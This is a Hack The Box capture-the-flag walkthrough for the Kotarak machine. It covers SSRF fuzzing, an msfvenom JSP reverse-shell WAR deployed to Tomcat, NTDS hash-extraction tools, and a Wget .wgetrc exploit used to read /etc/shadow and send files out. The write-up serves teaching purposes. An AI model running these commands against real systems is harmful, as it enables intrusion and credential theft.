Professional Documents
Culture Documents
Ko Tarak
Ko Tarak
Ko Tarak
Page 1 / 7
SYNOPSIS
Kotarak focuses on many different attack vectors and requires quite a few steps for completion. It
is a great learning experience as many of the topics are not covered by other machines on Hack
The Box.
Page 2 / 7
Enumeration
Nmap
Nmap reveals OpenSSH, Apache Tomcat and a normal Apache web server.
Page 3 / 7
Exploitation
SSRF
While there are quite a few vulnerabilities and attack vectors available for Tomcat, none appear
to be successful in this context. Looking at the web server on port 60000 reveals a rudimentary
proxy, which happens to be vulnerable to server side request forgery. By fuzzing the URL
http://10.10.10.55:6000/url.php?path=127.0.0.1:FUZZ it is possible to access several
localhost-only services.
Page 4 / 7
Apache Tomcat
Once logged into the manager, it is trivial to obtain a shell. The command msfvenom -p
java/jsp_shell_reverse_tcp lhost=<LAB IP> lport=<PORT> -f war > writeup.war will create a valid
war file that can be easily deployed. Once deployed and started, simply browse to
10.10.10.55/writeup to trigger the reverse connection, which can be received with Netcat.
Page 5 / 7
Privilege Escalation
User (atanas)
libesedb: https://github.com/libyal/libesedb
ntdsextract: https://github.com/csababarta/ntdsxtract
Page 6 / 7
Root
Exploit: https://www.exploit-db.com/exploits/40064/
Browsing to /root reveals an app.txt file, which contains a brief log of web requests. The log
shows that Wget verson 1.16 is run every two minutes. Looking at the network configuration
reveals that the request came from the local machine, so it is safe to assume that Wget is being
run as root.
Using authbind, it is possible to run the exploit script on the target and listen on port 80 with the
command authbind python exploit.py. Having an FTP server running on the local machine is all
that is require to serve .wgetrc.
By default, the exploit obtains the contents of /etc/shadow. Looking at the results, it appears that
there is an Ubuntu user which does not exist on the main system. Running it again for
/etc/passwd confirms that there is some kind of virtual machine or container system with a
separate filesystem.
Simply modifying .wgetrc at this point to post_file = root.txt will obtain the root flag.
Page 7 / 7